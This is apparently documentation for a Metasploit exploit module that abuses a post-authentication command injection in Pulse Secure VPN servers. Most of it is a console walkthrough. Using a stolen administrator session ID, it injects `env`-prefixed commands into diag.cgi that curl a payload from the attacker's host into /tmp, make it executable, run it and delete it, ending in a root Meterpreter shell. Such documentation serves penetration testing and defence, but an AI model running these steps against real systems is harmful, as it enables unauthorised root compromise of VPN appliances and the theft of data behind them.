## Introduction This module exploits a post-auth command injection in the Pulse Secure VPN server to execute commands as root. The `env(1)` command is used to bypass application whitelisting and run arbitrary commands. Please see related module `auxiliary/gather/pulse_secure_file_disclosure` for a pre-auth file read that is able to obtain plaintext and hashed credentials, plus session IDs that may be used with this exploit. A valid administrator session ID is required in lieu of untested SSRF. ## Targets ``` Id Name -- ---- 0 Unix In-Memory 1 Linux Dropper ``` ## Options **SID** Set this to a valid administrator session ID. Typically retrieved using the `auxiliary/gather/pulse_secure_file_disclosure` module. ## Usage ``` msf exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857 sid => 676f5f892e8c4a6419f10564f9e9d857 msf exploit(linux/http/pulse_secure_cmd_exec) > run [*] Started reverse TCP handler on 127.0.0.1:[redacted] [+] Setting session cookie: DSID=676f5f892e8c4a6419f10564f9e9d857 [*] Obtaining CSRF token [+] CSRF token: 6b0e020e1de8c68c043ea0e4f663b7a5 [*] Executing Linux Dropper target [*] Using URL: https://0.0.0.0:[redacted]/HSEjp77 [*] Local IP: https://[redacted]:[redacted]/HSEjp77 [*] Generated command stager: ["curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77", "chmod +x /tmp/qlUqDxCU", "/tmp/qlUqDxCU", "rm -f /tmp/qlUqDxCU"] [*] Executing command: env /home/bin/curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77 [*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi [*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi [*] Client 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) requested /HSEjp77 [*] Sending payload to 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) [+] Payload execution successful [*] Command Stager progress - 63.96% done (71/111 bytes) [*] Executing command: env chmod +x /tmp/qlUqDxCU [*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi [*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi [+] Payload execution successful [*] Command Stager progress - 87.39% done (97/111 bytes) [*] Executing command: env /tmp/qlUqDxCU [*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi [*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi [*] Meterpreter session 1 opened (127.0.0.1:[redacted] -> 127.0.0.1:53200) at 2019-11-12 02:05:40 -0600 [!] Payload execution may have failed [*] Command Stager progress - 102.70% done (114/111 bytes) [*] Executing command: env rm -f /tmp/qlUqDxCU [*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi [*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi [+] Payload execution successful [*] Command Stager progress - 123.42% done (137/111 bytes) [*] Server stopped. meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 meterpreter > sysinfo Computer : [redacted] OS : (Linux 2.6.32-00486-gddd7e32-dirty) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > ```